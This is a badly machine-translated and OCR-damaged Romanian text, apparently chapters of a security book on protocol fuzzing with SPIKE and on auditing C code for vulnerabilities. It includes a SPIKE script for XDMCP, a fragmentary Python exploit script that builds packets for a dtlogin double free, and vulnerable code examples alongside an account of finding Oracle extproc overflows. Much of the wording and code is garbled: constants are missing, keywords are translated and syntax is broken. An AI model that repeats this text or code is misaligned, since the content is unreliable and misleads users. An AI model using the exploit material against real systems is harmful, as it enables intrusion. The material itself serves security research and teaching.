Puțin real Loc de munca — Căutare vulnerabilități în programe ascultare TCP- și porturi UDP Fiecare din astfel de programe utilizări anumit reţea protocoale pentru interacțiuni prieten Cu prieten — uneori documentat, uneori Nu Din timp dezvoltare fuzzers în semnificativ măsura limitat rsgl-scenă- riami și alții încercări emulare protocoale Cu lor simultan modificare Implementarea în formă Reg script Oportunitati la creare numeroase de specialitate fuzzeri, destinat pentru specific proto- Alte oportunități fuzzing IIIov unu fuzzer pentru SNMP, un alt pentru NTTR, al treilea pentru SMTP și t d Dar •dar do, dacă SMTP sau niste un alt închis protocol tuneluri prin HTTP? *Gpkim modul în care de bază problemă devine constructie astfel de modele reţea Protocol care ar uşor și repede incorporat în un alt reţea proiect, și la acest permis ar în mod eficient a analiza Codul aplicatii G tsglyo identificarea defecte De obicei în procedură căutare folosit linii sunt înlocuite alții linii sau linii mai mare lungime, sau întreg numere sunt înlocuite numere mai mare adâncimea de biți Nici unul Două fuzzer nu dezvălui unu și acea la fel trusa defecte Chiar dacă fuzzer teste acea la fel Codul, el poate conduce teste în prieten bine, sau în limba germana Mai a fi dat alte nu valorile variabile Mai tarziu în acest capitol va fi considerată tehnologie, furnizarea dezvoltare astfel de modele, dar primul noi considera alte util tehnologii Alte oportunități fuzzing Exista mulți alții operațiuni, care Mai să fie efectuate fuzzers Cu exceptia A merge, tu poti profită deja gata cod, la salva timp Comutare biți /(omite, disponibil reţea protocol Următorul tip: comutarea biți (pic răsturnând) numit astfel de metodologie expediere linii pe Server, când la fiecare expediere condiție pic se schimba pe opus Asa de modul în care primul camp lungime acceptă foarte mare (sau negativ) sens, apoi în linia ASCII apărea ciudat simboluri, după ce sens x este înlocuit foarte mare (sau negativ) număr Orice din aceste transformări poate deveni cauză eșec, și Cum consecinţă — într-adevăr folosit defect Securitate La virtuti metodă comutarea biți ar trebui să atribuite apoi, ce corespunzător fuzzer foarte uşor crea, și la acest el permite dezvălui destul de putine interesant defecte In orice caz, la acest el fără îndoială are serios neajunsuri Modificare programe Cu deschis iniţială textele Comunitate Vultur Sursa a petrecut destul de putine eforturi pe implementare mulți protocoale reprezentând interes pentru analiză (mai des Total pe limba DIN) hacker schimbându-se deschis implementare pentru trimitere Mai mult lung linii sau numere mai mare adâncime de biți, A la fel performant alte manipulare pe client latură Protocol de multe ori a reusi dezvălui vulnerabilități care a fost ar Capitol Artă fuzzing foarte greu găsi chiar Cu Ajutor foarte bun fuzzer, scris "Cu zero " De multe ori aceasta este explicat subiecte ce protocol Bun documentat, A mulți valorile încorporat direct pe latură client Pentru tine nu Trebuie să ghici corect valorile câmpuri — ei voi sunt furnizate pentru tine automat Cu exceptia A merge, dispare necesitate ocolire fonduri autentificare sau verificări Control sume, incorporat în protocol, — client latură conţine Toata lumea necesar funcții Pentru protocoale protejat din reconstrucţie prin pe mai multe niveluri structurilor sau de sprijin criptare, Schimbare existent implementare de multe ori ramane singura Ieșire Ar trebui să înștiințare ce la realizarea greșeli prin ELF și DLL pentru tine chiar nu nevoie client Cu deschis iniţială textele De multe ori a reusi intercepta provocări niste bibliotecă funcții în client; aceasta este permite vedea date, transmise client, și manipula lor LA în special protocoale reţea jocuri (cutremur, jumătate de viață, Ireal și t e ) de multe ori avea pe mai multe niveluri structura pentru protecţie din biscuiti LA astfel de situatii acest metodă mai ales util Fuzzing Cu dinamic analiză Dinamic analiză (depanare ţintă programe în proces fuzz) prevede mulți util date și permite "conduce" fuzzer De exemplu, programe RPC de obicei a primi al lor variabile din acordat bloc date la Ajutor funcții xdr stng, xdrjnt și alții asemănătoare funcții interceptând aceste apeluri, poate sa a descoperi, ce fel date program se asteapta a primi în bloc Cu exceptia A merge, demontare programe în proces împlinire permite vedea, care Codul efectuat, și dacă Control nu transmise în specific ramură — a intelege, De ce exact De exemplu, poate a se dovedi ce program conţine comanda comparatii, care mereu se termină eșec în unu din directii The vedere analiză Mai mult nu primit datorată dezvoltare, dar în prezentul timp mulți dezvoltatori merge pe acest cale, căutarea la fuzzers Următorul generatii oţel Mai mult funcţional și rezonabil Program SPIKE Din considerare general principii muncă fuzzers noi Să mergem mai departe la specific fuzzer și sa vedem, cât costă în mod eficient poate muncă bun fuzzer chiar Cu suficient complex protocoale Acest fuzzer numit SPIKE și se raspandeste pe conditii GPL (www immunitysec com) Pușculiță LA SPIKE folosit de specialitate structura date, în mediu inconjurator fuzzers numit pușculiță (teapa) acestea OMS semn Cu teorie compilatoare operațiuni pe urmărire bloc date în pușculiță pare inainte de ciudat nu- Program SPIKE și și mi pa muncă o singură trecere asamblator Caz în volum, ce SPIKE de fapt asambla bloc date și magazine informație despre lungimi interior l a zilei demonstraţii muncă SPIKE noi pe scurt considera niste exemple Codul SPIKE scris pe DIN, asa de următoarele exemple de asemenea voi scris pa DIN LA original in stare tampon date gol date:<> s binary (" "): // Conservare binar date în pușculiță Date* s block size bi g-endi un-cuvânt ("nume bloc"); Date LA tampon rezervat adiţional loc (patru octeți): s block start("nume bloc"): Date L Aici în pușculiță adăugat Mai mult patru octeți date: s binary (" ") Date: () frate Atenţie: după completare bloc a intrat sens patru, apoi mânca marimea tampon: s block end ("nume bloc") Date The exemplu foarte simplificat, dar asemănătoare structurilor date — Cu Poate- sghw întoarcere și umplere dimensiuni — Joaca cheie rol în plan dezvoltare fuzzers ca SPIKE Cu exceptia A merge, în SPIKE Sunt funcții promovare (marshaling) apoi mânca transformări date în memorie la format, destinat pentru transmitere pe retelelor Sprijinit promovare mulți structurilor date, de multe ori folosit în reţea protocoale De exemplu, linii de obicei apărea în Următorul format: întreg numere la fel Mai prezinta-te în mulți formate și Cu diferit în ordine ca urmare a octeți și SPIKE conţine funcții pentru lor transformări în date, necesar pentru al tău protocol Modelare reţea protocoale Cu Ajutor structurilor date SPIKE Aplicație SPIKE API (sau asemănătoare interfețe API) pentru modelare arbitrar reţea protocoale are din apropiere beneficii SPIKE API prevede liniar reprezentare reţea Protocol apoi mânca reprezentare în formă secvente necunoscut binar date, întreg numere, dimensiuni și linii La modificări fiecare linii date dimensiuni în blocuri, încapsulând acest linia, Schimbare în în conformitate Cu actual lung bloc Tradiţional alternative — preliminar calcul dimensiuni sau funcţional Descriere protocol (Cum aceasta este se face în real client) Capitol Artă fuzzing Ambii opțiune cere Mai mult timp și complica acces la fiecare linia co laturi fuzzer Fuzzers SPIKE LA program SPIKE inclus mulți exemple fuzzers pentru variat protocoale din lor cel mai mare Atenţie merita MSRPC- și sunRPC-fuzzy- ry Cu exceptia A merge, atașat trusa generalizat fuzzers pentru convenţional TCP-i conexiuni UDP Sunt va deveni bun punct de start punct la fuzzing nou protocol Cel mai complet a sustine în SPIKE primit protocol NTTR HTTP- fuzzers pe baza SPIKE cu succes aplicat pentru identificarea defecte practic pe toate major platforme web; utilizare lor pentru căutare vulnerabilități servere web sau lor componente De măsura "creștere" (în August G program întors Două al anului) în SPIKE trebuie sa a aparea funcții analiză timp execuţie, A la fel asigurat a sustine adiţional tipuri date și protocoale Exemplu utilizare fuzzer SPIKE Pe iniţială dezvoltare SPIKE de obicei frunze mulți timp și eforturi Tem nu Mai puțin, în mâinile cu experienta utilizator program repede și uşor găsește greșeli, care, Cum regulă nu în in stare cauta chiar calificat analiștilor iniţială textele Pentru exemplu Hai sa luam protocol xDMCPD, sprijinit majoritate muncitorii statii Unix Cu toate că în mulți cazuri utilizator SPIKE încercând dezasambla protocol manual, în dat caz poate sa treci bine eteric — liber utilitate reţea analiză (www ethereal com); a ei fereastră afișate pe orez LA rezultat transformări SPIKE creează Următorul fişier: //xdmcp request spk //Compatibil Cu versiune SPIKE și superior //Port UDP //eşec numit Următorul întrebări //[dave@localhost src]$ /generic send udp ~/spikePRIVATE/xdmcp request spk //[dave@localhost src]$ /generic send udp ~/sp kePRIVATE/xdmcp request spk patru nouăsprezece //Versiune s binary (" ") //Codul operațiuni (cerere= ) // - unu octet //cinci - Două octeți mare endian s int variable( x ) //Lungime mesaje //s binary(" ") s binary block size halfword bigendian(„mesaj”) s block start(„mesaj”) // afișează număr Proi ramma SPIKE "captură* - eteric NV X Orez Analiză cerere X în eteric s int variable( x ), //Conexiuni s b nary(" T), //Tip retelelor s int variable( x ), //Adresa o sută //Conexiune s binary(" "), //Marimea în octeți //s b nary(" "), s b nary block size ha fword bigendian("ip"), / / p s block start("ip") s binary("c a ") s block end ("ip") //Autentificare Nume //s binary(" ") s binary block size halfword bigendi an ("authname"), Capitol Artă fuzzing s block start("authname") s string variable(""); s block end("authname"): //Autentificare date s binary block size halfword bigendian("authdata"), s block start("authdata"); s string variable(""); s block end("authdata"): //s binary(" "); //Nume pentru verificări ( ) // - unu octet s int variable( x ); //Marimea linii Cu în ordine jumatate de cuvinte Mare Endian s binary block size halfword bigendian("MIT"), s block start("MIT"), s string vanable(,,MIT-MAGIC-COOKIE-r'); s bloc endCMIT") s bi N / A ry block s ze ha fword bi Gendi an("XC"), s block start("XC"), s string vanable( „XC-QUERY-SECURITY-l”); s block end("XC"), //fabricare afişa d s binary block slze halfword bigendlan("DID,,), s block start("DID"), s string variable("") s block end ("DID") s block end ("mesaj"); Important particularitate fişier este în volum, ce el de fapt este Drept copie date analiză eteric Structura protocol salvat dar dat la liniar minte pentru facilităţi LA proces prelucrare fişier SPIKE generează modificat pachete cereri xdcmp și transmite lor obiect LA Solaris în niste moment cameră cu servere program de două ori cauze liber() pentru tampon, situat sub al nostru management aceasta clasic eroare repetate eliberare memorie, care poate folosit pentru interceptare management la distanta serviciu, lucru Cu drepturi rădăcină Deoarece dtlogin (program, în care merge mai departe accident) inclus în mulți versiuni Unix — AIX, Tru , Іхіх și alte, inclusiv cde, poate sa suficient cu încredere aproba, ce defect va fi fi prezent și pe aceste platforme Deloc nu-i rău pentru ore muncă Concentrarea pe acest atac, noi primim Următorul scenariu: # /usr/bin/python #Drepturi de autor Dave Altei #licență GPLv #GHIMPAT! > #v , / Program! SPIKE import os import sys import priză import timp C transformare int în şir Cu în ordine Intel def intel order(mying) • str="" a=chr(myint % ) myint=myint » b=chr(myint % ) myint=myint » c=chr(myint % ) myint=myint » d=chr(myint % ) str+=WWc" % (abcd) întoarcere str def sun order(myint) str="" a=chr(myint % ) myint=myint » b=chr(myint % ) myint=my nt » c=chr(myint % ) mywt=myint » d=chr(myint % ) str+="W(Mc" % (dcba) întoarcere str # se intoarce binar versiune linii def binstring(instring,size=l) rezultat="" # Șterge Toata lumea trece tmp=instring înlocui C ) tmp=tmp înlocuiți("\n","") tmp=tmp înlocuiți("\t" "") dacă len(tmp) % '= prinţ "încercat la șir de gunoi ceva de ilegal lungime" întoarcere "" in timp ce tmp ^'" doi=tmp[ ] # A lua în considerare simboluri Oh și \X dacă doi!=" x" și doi,="\\x"' rezultat+=chr(int(două, )) tmp=tmp[ ] întoarcere rezultat*dimensiune # Pentru emisiuni din fişier spk def s binary(instring) Capitol Artă fuzzing întoarcere binstring(instring) # Înlocuire linii "pe loc" LA Piton aceasta este nu este usor def stroverwr te( nstri ng overwri testri ng offset) cap= nstring[- decalaj] # Concluzie cap tal = nstring[offset+len(overwritestring)•] # Concluzie coadă rezultat=head+overwr tesring+tai întoarcere rezultat # La nu A greși Terminal def prettyprint( nstring) tmp="" pentru cap în incordare- Dacă cap IsalphaO tmp+=ch altfel valoare="%x" % ord(ch) tmp+="["+va ue+"]" întoarcere tmp # Punga de plastic conţine mulți date pachet ="" pachet l-*-=bi nstri ng (" x x x x x Ohaa x x x x ") packetl+=binstring(" x x x x OxcO xa x x x x x x x x ") packetl+=binstring (" x ") packetl+=binstring(" xfe Oxfe Oxfe Oxfe") packetl+=binstr ng("Oxfe Oxfe Oxfe Oxfe Oxfe Oxfe Oxfe Oxfe Oxfe oxfl xf xf ") packetl+=binstring("Oxaa Oxaa Oxaa Oxaa Oxaa Oxaa Oxaa Oxaa Oxaa Oxaa Oxaa Oxff") # Acea ce va fi transferat gratuitO în Următorul o singura data pachetl+=sun order( xfefbb f ) packetl+=b nstring("Oxcf oxdf Oxef Oxcf") packetl+=sun order (Ox fc ) packetl+=binstring("Oxff Oxaa Oxaa Oxaa") packetl+=sun order (OxffbedOlO) packetl+=binstring("Oxaa Oxaa Oxaa Oxaa Oxaa Oxaa Oxaa") packetl+=binstring("Oxff x f Oxff Oxff Oxff x f Oxff Oxff Oxff Oxff Oxff Oxff Oxff Oxff") packetl+=Mnstring(" xff x f Oxff Oxff Oxff Oxff Oxff Oxff Oxff Oxff Oxff Oxff Oxff Oxff") packetl+=b nstring(" xff Oxff Oxff x f Oxff Oxff Oxff x f Oxff Oxff Oxlf Oxff Oxff Oxff") packetl+=b nstring("Oxff Oxfa Oxff Oxfe Oxff oxfb Oxff Oxff Oxfe Oxff Oxff Oxff oxfd Oxff") packetl+=b nstr ng("Oxfl Oxff xf Oxff Oxf Oxff xf Oxff xf Oxff xf Oxff xf Oxff") packetl+=binstring("Oxff Oxff Oxff") # Sfârşit linii packetl+=binstring(" x x x x x d x x x x x x d") Program SPIKE p = MAILTMPLEN) syslog (LOG ALERT|LOG AUTH "Sistem spargere atentat, încercare, gazdă=OOs", tcp clienthost O); Format linii Vulnerabilități format linii atras la tu Atenţie aproximativ în an, și pe Recent niste varsta a fost deschis destul de putine serios vulnerabilități it-io clasă Date defecte fondat pe oportunități atacator a controla format linia, care transmise funcții primind argumente în stil printf (syslog, *printf și lor analogi) Dacă atac o sa primeasca Control de mai sus format linia, el va fi capabil transfer către directive, conducere la deteriora conţinut memorie și implementare arbitrar cod Aceste vulnerabilități în semnificativ măsura bazat pe puțin știut directivă %P, care scrie număr deja retras octeți pe index pe întreg număr Vulnerabilități format linii foarte uşor sunt găsite în proces analiză Cantitate functii, primind argumente în stil printf, relativ mic; de multe ori suficient alternativ verifica provocări aceste funcții pe articol A merge, poate dacă atac a primi Control de mai sus format şir eu De exemplu, următoarele Două apel syslog vizibil diferit prieten din prieten: Codul Cu potenţial vulnerabilitate: syslog(LOG ERR, șir) Codul fără vulnerabilitati: syslog(LOG ERR "%s" string), Dacă în primul exemplu linia şir va fi sub Control atacator, poate apărea amenințare Securitate La asigurați-vă că în existenţă vulnerabilități format linia, de multe ori cont pentru urmări curgere date pe niste funcții înapoi niste aplicatii conține proprii implementare analogi printf, asa de analiză nu ar trebui să fi limitat îngust a stabilit standard funcții Procedură identificarea defecte format linii suficient standard, asa de Căutare astfel de defecte poate efectuate automat cu cel mai mult răspândită loc căutare defecte format linii este Codul referinţă reviste De multe ori cont pentru vedea, Cum constant format linia transmise revistă functii, după ce concluzie trimis în tampon și transmise syslog Cu creare vulnerabilități Următorul ipotetic exemplu demonstreaza clasic vulnerabilitate format linii în cod funcții referinţă Buturuga: gol log fn(const char *fmt, ) { Capitol Analiză iniţială textele pe limbi familii DIN va st argumente: char log buf[ ]: va start(args fmt): vsnpri ntf ( og buf,sizeof( og buf) fmt args) va end(args): sys og(LOG NOTICE, og buf); } Vulnerabilități format linii primul au fost identificat pe Server wu-ftpd, A C mai departe au fost descoperit în mulți aplicatii Dar din cauza A merge, ce aceste* vulnerabilități foarte uşor Vino la lumina în proces analiză, ei practic complet a dispărut în toate major program pachete Cu deschis textele Sunt comune greșeli verificări frontiere De multe ori aplicatii încercând organiza verificare frontiere la implementare nesigure operațiuni; in orice caz, pe practică acest procedură de multe ori organizat gresit Greșeli verificări frontiere diferit din alții clase vulnerabilitati, în care examinare în general absent, dar în final cont rezultat se dovedește unu și subiecte la fel Ambii tip vulnerabilități explicat logic greșeli la implementare verificări Fără în profunzime analiză cod verificări aceste vulnerabilități de multe ori rămâne neobservat Alții cuvinte nu cheltuieli crede, ce niste fragment cod invulnerabil numai deoarece, ce el încercând Verifica frontiere Inainte de Cum urma mai departe, asigurați-vă că în volum, ce acest atentat, încercare se face dreapta bun exemplu greșeli verificări frontiere este defect preprocesor Sforâie RPC, descoperit grup ISS Forța X în din timp G Următorul fragment prezent în vulnerabil versiuni Sforâie: wh e( ndex mărimea) { DebugMessage(DEBUG FLOW "AVERTIZARE rpc decode calculat rău " "lungime %d\n” lungime) întoarcere } altfel totaljen += lungime, index += patru pentru (i= i allocjen) { char *fold buf, allocjen += allocjen; dacă (lastjen + len > allocjen) { allocjen = lastjen + len, fold buf = (car *)apr palloc(r->pool allocjen) memcpy(fold buf, ultimul câmp, lastjen), ultimulJMeld = fold buf, } memcpy(last field + lastjen, camp, len + ) Codul mânere anteturi MIME, transmise Cum parte cerere serviciu web* RU Dacă primul Două termeni dacă sunt adevărate apoi lungime dedicat tampon va fi pe mai mica, Cum urmează, și final apel memcpy scrie nul! octet pe frontieră tampon Utilizare acest defect pe practică extrem greu din cauza non-standard implementare grămezi; subiecte nu Mai puțin, față tu nu cu-' schimbătoare petrecându-se greșeli singur decalaj Orice ciclu, după pe cine linia se termină zero ar trebui să de două ori verifica pe articol greșeli decalaj Următorul fragment Daemon FTP OpenBSD demonstreaza problemă: char ncale[MAXPATHLEN] int , pentru (i = *Nume != „\ ” && i filename)) { /* Ocolire 'sistem ' */ pentru (cp = r->nume fișier *cp = ' ' && *cp l= „\ ” cp++) /* Ocolire ' //' */ cp += , Capitol Analiză iniţială textele pe limbi familii DIN Aici is absolute uri face ca urmare a: int = str en(uri): dacă ( (i > && strncasecmp(uri, "http //" ) == ) (i > && strncasecmp(uri "https //" ) == ) (i > nouă && strncasecmp(uri "gopher //", nouă) == ) (i > && strncasecmp(uri, Mftp /" ) == ) (i > cinci && strncasecmp(uri, "Idap://", cinci) == ) (i > cinci && strncasecmp(uri, "news /", cinci) == ) (i > && strncasecmp(uri, "mailto-//", ) == ) ) { întoarcere , altfel { întoarcere Problemă minciuni în comanda: c+= ; LA acest echipă Codul prelucrare încercând deplasați-vă constructie :// în URL Tem nu Mai puțin, a plati Atenţie, ce interior is absolute uri ne Toata lumea scheme URI completă- sunt simboluri :// La cerere URI drăguț Ldap:a program va fi dor nul final octet Mai departe tratament URI va conduce la înregistrări zero octeți în rezultat ce apărea potenţial vulnerabilitate LA dat caz pentru acest trebuie sa a fi instalat niste reguli suprascrie, dar asemănătoare Probleme Toata lumea Mai mult de multe ori întâlni în programe Cu deschis iniţială texte, și asa de lor ar trebui să da Atenţie în proces analiză Vulnerabilități simbolic comparatii Mulți programatori încercând Verifica lungime introdus utilizator date, dar la disponibilitate simbolic specificatorii examinare de multe ori efectuate gresit Mulți specificatorii lungime (astfel de, Cum dimensiune t) sunt nesemnat, și lor nu inerent Probleme simbolic specificatorii ca off t LA progres comparatii Două simbolic întreg numere la verificare lungime poate sa domnisoara posibilitate A merge, ce unu din numere negativ mai ales la comparaţie Cu constant reguli comparatii eterogen întreg numere nu mereu evident dar comportament compilate cod Conform standard ISO pentru limba DIN, la comparaţie Două întreg diverse tip sau mărimea ei anterior convertit la simbolic tip int, A apoi comparat Dacă orice din întreg depaseste pe mărimea simbolic tip int, ambii numere convertit la Mai mult tip, A apoi comparat La comparaţie nesemnat și simbolic numere nesemnat ting are mare prioritate De exemplu, ca urmare a comparaţie va fi nesemnat: dacă((int)a plecat rămânând > bufsiz) ? bufsiz r->rema n ng, len read = ap bread(r->connection->client, tampon, len to read) Aici bufsiz — simbolic întreg număr, definire volum liber locuri în tampon, A r->rămanând — simbolic număr tip off t, definire marimea fragment și lizibil direct din cerere Presupus, ce variabil len to read va fi atribuit cei mai putini sens din bufsiz și r- > ramas, dar dacă marimea fragment negativ acest verificare a reusi ocolire La transfer negativ mărimea fragment ap bread sens convertit în foarte mare pozitiv număr, și merge mai departe foarte mare Operațiune memcpy Defect pur şi simplu și evident operate în Win prin substituiri da, A grup gobblcs Securitate grup demonstrat ce el la fel poate folosit în BSD din cauza greșeli în implementare memcpy Defecte acest tip continua întâlni și în contemporan programe Fi atent pretutindeni, Unde simbolic întreg numere sunt utilizate în calitate specificatorii lungime Întreg revărsare Par a fi, termen "întreg revărsare" a intrat în Modă Acum lor ora desemna larg cerc vulnerabilitati, mulți din care nu avea relaţie la "real" întreg revărsare Primul clar definiție întreg revărsare a fost dat în raport "Profesional analiză original cod" pe conferințe pălărie neagră STATELE UNITE ALE AMERICII în G , cu toate că acest problemă și anterior a fost cunoscut și descris specialişti în zone Securitate Întreg revărsare merge mai departe apoi, când întreg număr depaseste a lui maxim admisibilă sens sau dă de mai jos minim Maxim și minim valorile întregul numere depinde din a lui tip și mărimea pe biți întreg co semn Are maxim sens ( x fff) și minim sens - (- x ) pe de biți întreg fără semn Are maxim sens patru (Oxffffffff) și minim sens Dacă pe biți întreg co semn, egal , va fi a crescut pe , aceasta în rezultat întreg revărsare devine egal - Capitol Analiză iniţială textele pe limbi familii DIN Întreg revărsare poate veni la îndemână pentru ocolire verificări marimea şanţ sau pentru alocare tampoane marimea care evident insuficient pentru depozitare copiat în lor date La categorii întreg aglomerat nia în general caz raporta revărsare adunare/scădere și revărsare* cunoştinţe multiplicare Revărsare adunare/scădere apare la plus sau scădere Două cantități, în rezultat pe cine rezultat ieşind pe top sau inferior frontieră întregul tip De exemplu, Următorul Codul creează potenţial Pericol întreg revărsare: char *buf, int allocat on size = dimensiunea definită atacatorului + şaisprezece buf = malloc(dimensiune alocare); memcpy(buf nput attacker def ned size); Dacă sens variabil dimensiunea definită atacatorului minciuni în gamă din -şaisprezece inainte de - , plus va cauza întreg revărsare, și tampon, dedicat în rezultat-, tate apel malloc(), va fi prea mult mic pentru date, copiat provocare mempy() Ca Codul foarte de multe ori se intalneste în aplicatii, distribuite Cu deschis iniţială textele Exploatare asemănătoare vulnerabilități conjugat Cu niste dificultăți și Toata lumea la fel astfel de defecte exista- stv-yut Revărsare scădere de obicei apare apoi, când în program presupus niste minim marimea introdus utilizator cantități Asa de, în Următorul fragment exista amenințare întreg revărsare: #def ne HEADER SIZE şaisprezece char date[ ],*dest int n, n = citiți(șosetă,data sizeof(date)), dest = malloc(n) memcpy(dest,data+HEADER SIZE,n - HEADER SIZE) LA acest exemplu întreg revărsare se va întâmpla dacă marimea citit din retelelor date mai mica presupus minim mărimea (ANTET MĂRIMEA) Revărsare multiplicare apare la multiplicare Două cantități, rezultat pe cine depaseste maxim admisibilă sens întregul tip Vulnerabilități acest tip au fost descoperit în OpenSSH și bibliotecă Soare RPC în G Următorul fragment OpenSSH (inainte de versiuni ) este tipic exemplu revărsare multiplicare nresp = packet get int() dacă (nresp > ) { raspuns = xmalloc(nresp ★ dimensiunea(car*)) pentru (i = , i cAoracle txt') Primul noi încercat îndeplini comun operațiuni în echipă crea sau a inlocui biblioteci, manual substituind cereri și privind pe petrecându-se (în depanator și filemon) Dar apoi noi încadrat prea mult lung Nume biblioteci: CREA SAU A INLOCUI BIBLIOTECĂ extjib ESTE 'AAAAAAAAAAAAAAAAAAAA După ce numit pentru -l funcţie: CREA sau a inlocui FUNCŢIE get valzz ÎNTOARCERE varchar LA FEL DE LIMBA C NUME "c get val" BIBLIOTECĂ extjlb: Selectați get valzz din dual: A avut loc ceva ciudat — resetare conexiuni, ce de obicei marturiseste despre niste excepție Ciudat a fost apoi, ce aceasta este a avut loc nu în proces oracol, A undeva în prieten loc După mic de statura analiză în FileMon noi hotărât depanare proces Lnslsnr (TNS ascultător) care mânere protocol TNS și este mediator între Oracol și extproc la apel extern proceduri Deoarece proces tnslsnr Pornește extproc, a fost folosit depanator windbg, furnizarea simplu trasarea filiale proceselor Necesar secvenţă acțiune s-a adeverit suficient dus: Stop Toata lumea Servicii Oracol Alerga serviciu bazele date Oracol ("OracleService ") LA sesiune comanda linii pe interactiv lucru masa a executa comanda: windbg -despre tnslsnr executabil windbg depanează TNS Ascultător și Toata lumea procese, lansat TNS ascultător Proces TNS Ascultător lucru pe interactiv lucru masa Desigur, după acest noi pe loc la fel a văzut dorit excepție în windbg: Primul şansă excepții sunt raportat inainte de orice excepție manipulare Acest excepție Mai fi așteptat și manipulate eax= ebx= ec ecx= edx=ffffffff esi= ebbfec edi= ec f eip= esp= ea ebp= iopl= n v sus ei pl zr N / A po nc cs= b ss= ds= es= fs= b gs= efl= ?? ??? Tipic arhitectural defecte II i listare este văzut, ce în extproc exe a avut loc clasic revărsare sieka Testare a aratat ce problemă a apărut nu numai pe platformă Windows La fel de s-a dovedit, dat vulnerabilitate a apărut în rezultat remedieri anterior greșeli — adăugat funcţie înregistrare cerere pe performanţă ikchiniya proceduri s-a adeverit vulnerabil pentru revărsare Să rezumam rezultate proces, care a adus la Identificare aceste Două erori: l Noi dispuse informație despre probabil arhitectural puncte slabe (Disponibilitate informație despre Probleme în asemănătoare sistem SQL Server) Pe bază acest informație a fost făcut presupunere, ce asemănătoare greșeli Mai exista și în oracol, Asa de Cum sigur implementare apel stocate proceduri — caz foarte dificil despre LA rezultat atent cercetare și trasarea comportament Oracol a fost identificat posibilitate împlinire extern proceduri fără autentificare — eroare cameră unu despre Înapoi la acest zone, noi descoperit ce la utilizare prea mult lung nume biblioteci merge mai departe ceva ciudat (după Ieșire "petice" la primul defect extproc) despre Cercetare Cu aplicarea depanatoare și fonduri fişier monitorizarea (excelent utilitate FileMon Rusinovici și Cogswell) permis dezvălui vulnerabil Componente despre LA rezultat depanare componente a fost găsite excepție, depunând mărturie despre revărsare grămadă — eroare cameră Două Nici pe unu din etape analiză ne aplicat fonduri automatizare; întregul proces a fost bazat pe atent studiu testat sisteme La acest noi complet ignorat documentație și încercat a intelege logică muncă sisteme în context informație, primit în rezultat Colectie informație In cele din urma cheltuieli înștiințare ce companie Oracol publicat detaliat informație pe ambii defecte, A la fel eliberată "plasture" complet hotărât ambii Probleme Tipic arhitectural defecte La fel de noi a fi sigur în anterior exemplu, în asemănătoare sisteme de multe ori întâlni asemănătoare erori Când în curgere mai multe varsta cont pentru zilnic a citi articole Cu informație despre defecte Securitate, Involuntar start înștiințare modele și utilizare lor în proprii cercetare hai sa sa incercam înţelege aceste modele, deoarece ce în lor poate sa culege idei pentru mai departe cercetare Frontieră Probleme La fel de regulă Probleme Cu Securitate întâmpla în diverse drăguț tranzitii: între diferit proceselor între diferit tehnologie, între diferit interfețe Mai departe sunt date niste exemple Capitol paisprezece instrumental analiză Proces remiză la extern proces pe volum la fel gazdă bun exemple servi deja menționat defect Oracol și problemă interceptare numit canale, descoperit Andreas Junstam (An-visează Junestam și descris în Microsoft Buletin MS - L La vedea rând interesant oportunități extensii privilegii utilizare utilitate MânerEx (Cu site-ul sysinternals) și urmă pe permisiuni global obiecte Windows (astfel de Cum sunt comune secțiuni memorie) Mulți aplicatii nu rezervat din local atacuri Pentru Unix tipic întreg morman Probleme legate de Cu sintactic analiză parametrii comanda linii la circulaţie la extern proces pentru împlinire niste funcții Mai mult o singura data cheltuieli reaminti, ce pentru deținere analiză foarte important corect selecţie unelte Probabil, în dat zone mai bine Total potrivi program Itrace Proces remiză la extern bibliotecă dinamic aspect Exemple la fel întâlni în Oracol și SQL Server — aceasta este și original defect proces extproc, descoperit David Lichfield (Oracol, avertizare ), și întreg rând Opțiuni revărsare în stocate proceduri identificat în SQL Server numeroși exemple la fel întâlni în filtre ISAPI servere Microsoft iis, inclusiv componentă Comerţ Server, filtru ISM DLL, filtru SQLXML, filtru ISAPI imprimanta și mulți alte unu din motive pe care apărea Probleme, este în volum, ce analiștilor petrece Toata lumea timp pe verificare de bază regim muncă reţea demon, dar a uita despre posibil extensii In orice caz, Server IIS nu singuratic LA calitate exemplu poate sa specifica pe greşeală părtinire pe unitate în modul mod ssl apache, A la fel în module mod mylo, mod cookies, mod frontpage, mod ntlm, mod auth any, mod access referer, modjk, mod php și mod dav La efectuarea analiză necunoscut sisteme „vulnerabil locuri" de obicei cheltuieli căutare exact în acest funcţional zone Proces cauze funcţie pe la distanta gazdă Mai mult unu "zona risc", cu toate că dezvoltatori de obicei mai bine a intelege legate de Cu a ei Pericol Defect DCOM-RPC (MS - ) dovedeste ce Probleme astfel de drăguț continua exista La acest categorii se aplică majoritate defecte RPC, inclusiv Soare UDP RPC DOS, revărsare localizator serviciu, numeroase revărsare Microsoft schimb valutar, descoperit David Amtelom, și vechi defect format linii statd, descoperit Daniel jsy-cobowitz (Daniel Jacobowitz) Tipic arhitectural defecte Probleme transformări date Când date convertit din unu forme în un alt de multe ori a reusi deplasați-vă niste proceduri verificări LA realitate vorbire merge despre fundație alpoy problemă, legate de Cu transformare gramatician abundenţă Probleme i A pe cine drăguț (de multe ori numit greșeli turnate la canonic minte) explicat excepţional complexitate creare sisteme, în care confuzie gramatician program interfețe scăzut ar la promovare mult mai jos pe ierarhie apeluri DIN formal pozitii aceasta este poate sa explica Asa de: funcţie f() unelte o multime de moduri muncă F Pentru acest f() cauze funcţie d() și transmite a ei parte al lor intrare date Funcţie g unelte o multime de moduri lucru ii G La din pacate în o multime de moduri muncă G sunt incluse niste moduri, acces la care prin f() a fost ar nedorit Hai sa sunăm o multime de astfel de moduri Gbad Prin urmare, funcţie f() trebuie sa implementează niste mecanism, care ar garantat ce o multime de F nu conţine nici unu element Gbad Dezvoltator funcții f() poate do aceasta este numai unu cale: el ar trebui să complet a intelege toate structura g, organiza verificare toate intrare date f() și asigurați-vă că în volum, ce nici unu combinaţie intrare date nu Oportunitati la elemente Gbad Problemă apare pe Două motive: despre Coborâre dar ierarhie apeluri aproape mereu Oportunitati la complicaţie funcţionalitate asa de în f() cont pentru tine cont de prea mult mulți cazuri despre Similar problemă apare în d(), A la fel în h(), eu(), j() și t d pe ierarhie apeluri Pentru exemplu Hai sa luam fişier sistemică funcții Win Sa spunem disponibil program, care transmise Nume fişier Dacă program suporturi concept Nume fişier, hopa sugerează ca urmare a: despre Nume fişier poate Sfârşit extensie Extensie de obicei (dar nu mereu) Are lungime în simbol, A semn a lui completare este punct (,) despre Nume fişier poate a fi complet LA acest caz aceasta începe Cu scrisoare denumiri disc, pe care ar trebui să colon (:) despre relativ nume fișiere conținând*! simboluri verso bară oblică (\) despre 